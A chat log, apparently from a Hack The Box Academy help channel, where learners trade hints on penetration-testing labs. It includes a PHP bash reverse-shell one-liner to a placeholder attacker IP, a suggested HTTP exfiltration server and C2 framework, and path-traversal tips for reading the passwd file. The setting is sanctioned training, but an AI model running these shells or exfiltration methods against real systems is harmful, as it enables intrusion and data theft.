    <fail_count type="integer">5</fail_count>
  </blacklist>
</users>```

My output:

└──╼ [★]$ curl http://10.129.215.78/data/other/authorization.xml | xmllint --format -
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-100 114 100 114 0 0 6212 0 --:--:-- --:--:-- --:--:-- 6333
<?xml version="1.0" encoding="UTF-8"?>
<item>
<apikey><![CDATA[4f399dc72ff8e619e327800f851e9986]]></apikey>
</item>

Whats up with the wget like download output? Also, other than that is it "working"?

any concerns?

i was hoping for prettified output

its not much diff than curl this might just be a poor example

ok nvm i tried with a longer file, its working

oh my good now I get it, I don't understand anything xD

Has the AD enum assessment 2 been updated? SAM hashes are different now?

Can't believe I can see the 9 at the front. Seemed almost impossible at the start

:D

I’m doing the local file inclusion. Can anyone tell me why this isn’t working? It should display the passwd file but it’s just blank now

Nice screenshot

Lmao my Mac can’t download discord

you probably need a few ../../

You’re right thank you

Working through Shells and Payloads on Antak section, can't find the portion of the website allowing me to upload a file... Any nudges?

Intro to Academy's Purple Modules - on the zabbix part, I got the shell after running the exploit. I can't seem to find the root.txt file that's supposed to be in /root. Any advice what I might be doing wrong?

its right there at the bottom

CPTS : Information Gathering - Web Edition (Web Archives)

10th june 2017 ?

0 snapshots ?

Hackthebox didn't always use .com

Okay will look into that, thx for the reply

They are an eu based company. Your only other hint

lol

Am I going blind then, because I don't see anything....

how can we use the vpn? if im using a wsl

Hello could someone help me, im new to all this im in the getting started module specifically on the service scanning part and needed help to get the password neede to answer this question of listing the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file

did you add the vhost?

Yeah, I'm actively searching the website, but I don't see an upload

unless I'm supposed to do it through status.inlanefreight.local and not the IP that you spawn in

thats the point of the vhost

yeah I put the IP to the vhost, but I get different websites lol

exactly

what have you tried?

so in that case, which am I supposed to use? the IP address or status.inlanefreigt

vhost

it says vhosts needed right under the ip

See that's dumb I'm scanning this website trying to brute force directories to find it

lol that was simple thanks for the help there

ive done smbclient -N -L \\10.129.42.253, but i didnt see anywhere in the module that the password was given

says that you need to authenticate as bob, maybe try doing that

https://tenor.com/view/good-morning-coffee-grinch-gif-23189401

what would the command be to do that?

don't remember the flag off the top of my head but you can print the help menu for smbclient

or do man smbclient

ok sounds good thank you

what module

Hey guys im in web proxies assessment, question 1
I added a match replace rule to change from disabled> to enabled>, response body, when I test the rule in proxy settings on burp suite it works but when I send the request to repeater and I get the response back its still disabled>

i dont think it goes through repeater

but repeater should be able to bypass that

What's is "it"?

the rule

the 'getting started' module in the cpts certfication and im on the service scanning page

So why is it possible to create a rule if you can't use it?

they give you the password in the section

probably cause it proxy settings and not repeater?

ok ill read over it carefully thank you!

So you can't change responses?

can someone help plz?

OK, so I'm working on the skills assessment of the file upload module, I've exfiltrated the source files and figured out how things work as best I can. I've got the upload directory location and how the script names the file. However, the issue that I'm running into is actually finding and executing the file. I keep trying to navigate to the image to execute the code but I keep getting 404 responses. Any thoughts?

dont think so

what did u do?

did you input a url with the payload?

i just copied the domain is there anything else to do?

did you follow the example?

then you got the wrong file location

you should be able to find it with the source

🫡

I'll go back and re-read it.

Okay this was most definitely the most stupid question I've ever seen on HTB. Holy cow that was such a waste of time I want to sit down with whoever created this box and study his old childhood traumas

Such bs, I made a script that did the exact same thing as burp and after 32 attempts it gave me the flag

Lmao nice work

Anybody having trouble with the Windows Lateral Movement labs this morning. I can't RDP with provided credentials, I've changed VPN and restarted machines many times.

Just keep getting [11:16:28:048] [4800:4800] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

The same way you'd do it on a VM, download the ovpn file and open it with ovpn.

Are you wrapping the username/password in single quotes?

I've tried, and I've also tried with reminia

which section

The WSUS, and also the skills assesment.. no ping back on any protocol for the provided creds

I just launched the WSUS section and was able to connect to the target via RDP with the provided credentials. Did you change VPN regions, and afterwards did you completely reload the website (CTRL+SHIFT+R)?

Maybe you have the correct information but aren't using the proper path to the uploaded file? I'd have to see if to know for sure.

I am currently studying the blood hound module of AD. When I connect to the target machine from pwnbox as described and run the prepared sharphound.exe, I get an error and cannot get the information. How can I deal with this?

What is the error

I am using the credentials provided in the module and I am able to get a shell with evil-winrm and impacket-wmiexec. However, RDP does not connect. The error is as follows

|ERROR|Unable to connect to LDAP, verify your credentials

which section

hey cam someome tell me if we can hack the cubes htb

No

it is for hacking and testing

so why not try hacking cube

That’d be illegal

Visualizing the Data:Nodes

im a teen my parents wont allow me to spend money so any suggestion how i can keep going without spending money

some modules are expensive like 500 cubes

#giveaways ; participating in CTFs, selling your soul

¯_(ツ)_/¯

tell your mom that it's better than spending money on VBux

how can i speed this up? 💀

i did a scan of -sU -sV -vv -Pn -p- --disable-arp-ping

you cry

you don't necessarily need to do -sU btw

why sir

you just don't

i alwayys get flitered or close port on port 53

but sometimes it's just a silly thing with it

im trying how to get pass ids/ips

-T4

you also don't really need -vv

i did -T 0 on that i forgot to include hahaha

-T 0 is slowest timing

i see

what is vv for sir in your own exp? i just found it on google so i tried

it just makes the output more verbose

stop being a skid and just trying things and actually read documentation

https://nmap.org/book/man-briefoptions.html

How old are you?

15

can i find a guide on OPTinselTrace24-2: Cookie Consumption

Get parental consent buddy. You need to be 18 or over or have consent

that's the active CTF yeah?

oh wait no i didnt get it on google, ippsec always do use it i just copied his scan ahahaha

yeah still trying to learn

even still. Blindly copying and pasting makes you a skid

the man pages are gonna be your friend for any command

man <command> or <command> --help

but why it is free for everyone

Terms of Service bud

there is no age limit

yeah ill take that as inspo tyty

On the website it is 18+

but im not blindly copying do i always ask gpt whatever i use

https://resources.hackthebox.com/hubfs/Legal/UA.pdf

GPT isn't perfect

🤦‍♂️

i barely trust GPT to give me accurate results

https://tenor.com/view/face-palm-gif-21502953

it's an OK tool for basic stuff, but it shouldn't replace classic research and reading

copy sir ill take note of that

does this look good

i will always tell you: Try before asking

whats the pdf about ...? its 14 pages long to large to read

contradict yourself in the next 5 seconds bruh

User Agreement

mybad

literally one of the things you agree to when you sign up to htb

@drifting trail this is the important bit

2. Access and Use of the Services.
   You must be at least 18 years old, and you must register under your real name and valid email.
   2.1. Eligibility Requirements. To access and use our Services, you are required to meet the following eligibility
   criteria:
   (a) You must be at least 18 years of age.
   (b) You need to have read, understood, and agreed to this User Agreement and our Privacy Notice.
   (c) You must register for an account using your actual name and a valid email address.
   (d) You should not be subject to any restrictions that prevent you from using the Services. This includes,
   but is not limited to not being:
   a. Legally or regulatorily barred from using the Services in your jurisdiction.
   b. A resident or citizen of any jurisdiction under sanctions imposed by the UN, US, UK, or EU.
   c. Personally subject to sanctions by the UN, US, UK, or EU.
   2.1.2. Underage Users. If you're under 18, a parent or guardian over 18 must accept this User Agreement on
   your behalf, thereby assuming responsibility for your compliance with these terms.

okay if i get my parents consent is that okay ...?

there's a whole form; reach out to support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Yes. https://help.hackthebox.com/en/articles/9456556-parental-consent-and-approval-for-users-under-18

heh found a typo in the UA. sec 4 sub 5 (4.5)

Nice one

we require that individuals under 18 years of age obtain parental or legal guardian consent before registering for an account and using our services. so i can get my parents consent

Yea, and fill the form and send it to support

^

it's for legal protections reasons

no bigge in a min

stating that your parent/guardians understand that HTB is not liable if you do some dumb skid shit and try and hack the government ||and get a visit/call from a 3-letter agency||

i know i have read that stuff ages ago

can i find a guide or something which help me to complete OPTinselTrace24-2: Cookie Consumption

No

this wouldn't be the right channel anyway

it's an active sherlock, so sharing writeups is explicitly against ToS

#sherlocks ; you'll need to link your account via the #welcome message

what does this mean

add --max-retries=3

also i suggest resetting the lab between attempts in the event that it's blocking you

if you trip the alerts it does temp block you

copy that thank you for letting me know that is one of my problem aswell

Hello guys,
I'm completely stuck on Rapid Triage Examination & Analysis Tools from Introduction to Digital Forensics.
I've tried some things with Timeline Explorer then in MFTExplorer but I can't get then answer...
I can't even find uninstall.exe but I know i need its zone.identifier...

hey if any could help , im in module injection attacks skill assessment , i reached to the internal app and its parameter but i can't craft the payload that gets all records especially since pdf is so small

May I please get help with the "ATTACKING AUTHENTICATION MECHANISMS" -> "Signature Wrapping Attack" lab? It seems that whether I do the attack manually or try all 8 XSW methods in the Burp Suite SAML Raider extension, I get the error "Invalid SAML Response. Not Authenticated". I've also checked to ensure the XML isn't broken.

if you are beautifying or whichever, dont

I got stuck there due to the code being beautified

I'd seriously appreciate some help on the medium lab in Network enumeration with nmap - IDS/IPS evasion techniques. I've tried using multiple flags such as -sS, -Pn and built in nmap scripts but its either returning as filtered or erroring out.

It's one of the beginnner modules so if anyone can lend a hand id be ecstatic

I wasn't intentionally beautifying it, and the Burp SAML Raider extension did work on the earlier signature stripping attack so I didn't think that would be the cause. I'll try again, removing newlines.

yeah, all other sections worked with beautifier

that one, did not

Thank you

hope it solves the issue for you

what are you on about @cloud ginkgo

I got the flag! Thanks for your help!
It was so easy to do manually without SAML Raider once I did it in a text editor. Before when I failed, I was also doing it in a text editor but I had copied it from the SAML Raider tab in Repeater.

great job 👏

I'm getting this when attempting Windows PrivEsc -> User Account Control lab.

If I run it twice first time it works second time it displays this, third time works XD

but I do not get a connection back in any of these

I'm using a windows-based attack host (Commando VM)
windows firewall on my device is disabled.
and this is the newest Metasploit version.
I tried pinging me from the target and it worked.

so idk why I'm not getting a connection back

This DLL just won't work....

I guess you configured the 'sttstr.dll' to invoke reverse shell.

Maybe it is something with your connection? try configure the dll to add an administrator user.

Or alternatively, what command did you use to invoke the dll?

Hello is there anyone that can help me with my iPhone I have an iOS 18.2 installed and I installed it yesterday, I was initially on iOS 17.5.2 and decided to go on 18.
I downloaded an app called Scarlet and enable it to be trusted on my iOS 17 and after upgrading to iOS 18 it was still working, the following day I tried to open it and it said the app could not be verified of it’s integrity. Could anyone tell me what’s going on?

This has nothing to do with htb academy

Oh men

🥲

It doesn't. Sounds like the app needs to be updated but it's not related to htb academy or any of the learning modules, so it's not for this channel

Reading channel descriptions, #welcome, and #rules when you go in a server is important

I can't send images here?

read and follow #welcome

Its not showing follow. I think I already followed it

I'm stuck on Information gathering DNS zone transfer. I'm not sure where I'm going wrong, following the example in the lesson. Anyone here know what I'm doing wrong?

Since your username is white, I think you have not yet verified your user.

Tried in both my own machine and the pwnbox

.htb is not an official top-level domain. It can therefore not be resolved from the root servers.
Specifies the IP address of the target as the name server.

Roger thanks

How do I get verified pls

read and follow #welcome

Has anyone been able to answer this question? Looks like its been an issue for a while, I'm having the same problem.

Intro to Binary Fuzzing > Glee with Klee Question #2, running it I only receive one error (null page access) that the module won't accept as the answer.

I've done that

It's showing "done reading, checkout modules"

This one?
/identify (ACCOUNT_IDENTIFIER)

Oh, I don't think I ever did that
Lemme try that

Got it, I had to add the IP to the /etc/hosts file

It is done, thank you very much

Pls I really need help with this, I've tried searching for exploitable open services, I got the openssh 9.2p1(regreSSHion) but I just can find am exploit for it.
I've tried checking with searchsploit and metasploit but still no result 😕

Read the topics for DNS again.
If you specify a domain as a name server, it must first be resolved.
Sure, you can put the domain in the /etc/hosts file. But your PC still has to resolve the domain every time.
Therefore, whenever possible, use the IP address of the name server and not the domain
Instead of dig @one.one.one.one example.com you should use dig @1.1.1.1 example.com

You are not scanning the correct port

😮
Oh, I should have only scanned for port 57897 right

I was trying that but it kept timing out for some reasons. Worked once I added the target IP address to the hosts file. Is that the incorrect way?

It's not incorrect. It just takes several queries.

So first it has to resolve the name of the name server in order to then query it.

can anyone help i cant able to talk in general

Read and follow #welcome

Hey guys i'm doin the python3 modul and i'm stuck with this error can someone help me?

Is BeautifulSoup installed?

yes i cheched, uninstalled reinstalled but stil same problem

also tried to run in vrtl env but don't work same error

Is there an order to follow in the paths like senior web and cape?

I recommend working through the modules in the order of the path.

There are some introductory modules, but it's unclear what the order is for them, e.g. learning process, setting up etc.
Is there a recommended order to those?

Just following this path
https://academy.hackthebox.com/path/preview/information-security-foundations

Ahhh, right thanks

Hi everyone, I'm new here, I have to connect by ssh I'm in the module linux fundamentals, everything is setup, but it doesn't accept the password, can someone help?

I've already download and connect their openvpn tcp 443

Hey, doing the Skill A 1 of AD from cpts, any clue where i can find the exe of Rubeus and import it into the victim machine (MS01) or compile it directly there ?

@somebody can help with this?

send the code directly, looks like a circular import issue

`import requests
import re
from bs4 import BeautifulSoup

PAGE_URL = 'http://target:port'

def get_html_of(url):
resp = requests.get(url)

if resp.status_code != 200:
    print(f'HTTP status code of {resp.status_code} returned, but 200 was expected. Exiting...')
    exit(1)

return resp.content.decode()

html = get_html_of(PAGE_URL)
soup = BeautifulSoup(html, 'html.parser')
raw_text = soup.get_text()
all_words = re.findall(r'\w+', raw_text)

word_count = {}

for word in all_words:
if word not in word_count:
word_count[word] = 1
else:
current_count = word_count.get(word)
word_count[word] = current_count + 1

top_words = sorted(word_count.items(), key=lambda item: item[1], reverse=True)

for i in range(10):
print(top_words[i][0])`

sorry for the long cp guys

its same as in the module

Any nudge on this (1747) Crackmapexec skills Assessment Question 3?

In same predicament have SQL01 rooted and for the hint in DEV01 suggests credential reuse + some sort of bypass. None of the creds I have are working on DEV01

then you need to install BeautifulSoup

why not trying another tool such as Kerbrute ?

I am also facin the same issue. Did youhappen to solve this successfully?

Yeah make sure after getting the shell you make it stable using python.

That was the silly mistake

quick question all, i have a reverse shell up for an initial foothold ... i wanna run linpeas then get back the output... can i send it to the same nc listener or do i need a separate one just for the file transfer?

ie: does it handle multiple connections?

tryign to figure out the best workflow for how to reduce complication on my end wondering if this might be a strat

I use a http server on "host" in my case kali that accepts uploads and downloads.
There are many Open Source projects on Github for that. I belive it makes it easy to exfil data.

So are you using a turnkey something or other you've setup with php and stuff that allows CRUD?

post/put for the file to the server?

I use this "https://github.com/IngoKl/HTTPUploadExfil"
dont know if i am allowed to post the link but i hope i am

its tooling, should be fine (as i understand the rules)

already tried

Uhm, if you wouldnt mind humoring me another question perhaps a lil silly, when you connect to a reverse shell like this:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/PWNIP/PWNPO 0>&1'"); ?>

is this considered a "full tty"

ie: no need to run a python3 -c "import pty;pty.spawn(...)"

the php reverse shell im connected to, i cannot press up for past cmd, i cannot press left arrow to go left etc

earlier in the module it suggested that upgrading to full tty resolves this issue (but even when i did, i still couldnt use the arrows and other stuffs)

I am not 100% sure. What i can recommend and a tool that i use is Sliver c2
If you look into it and learn it, It will help you a bounch.

No

No

This is not hacker for hire

I belive you shouldn't ask this question here.

hi, i'm stuck with web attacks module skill assesment, please help me

oh shit its fucking cubes talks

holy fuck i was waiting all week for this and missed it

Where you stuck at?
Give me some info 🙂

oh god its WAY over

..

What have tools have you run?

I do fuzzing and find out APIs like api.php reset.php. and I read some hints from the hackthebox forum, but everyone mentioned api.php/user/<uid>. How can I know exactly /user/<uid>???

by fuwwing zith rqndo; nu;bersM

Best source to get the correct information is in the modules you have done. Go back and read again.

ow qwerty was activated

by fuzzing with random numbers i guess no?

no no, i mean "/user"

uid is a user unique identifier (number)

how to found "/user"?

also by fuzzing

with a wordlist

like ffuf -w wordlist.txt:FUZZ -u http://ip:port/FUZZ

hmm, thanks, i will try again

do you know how to work with ffuf first? @naive cedar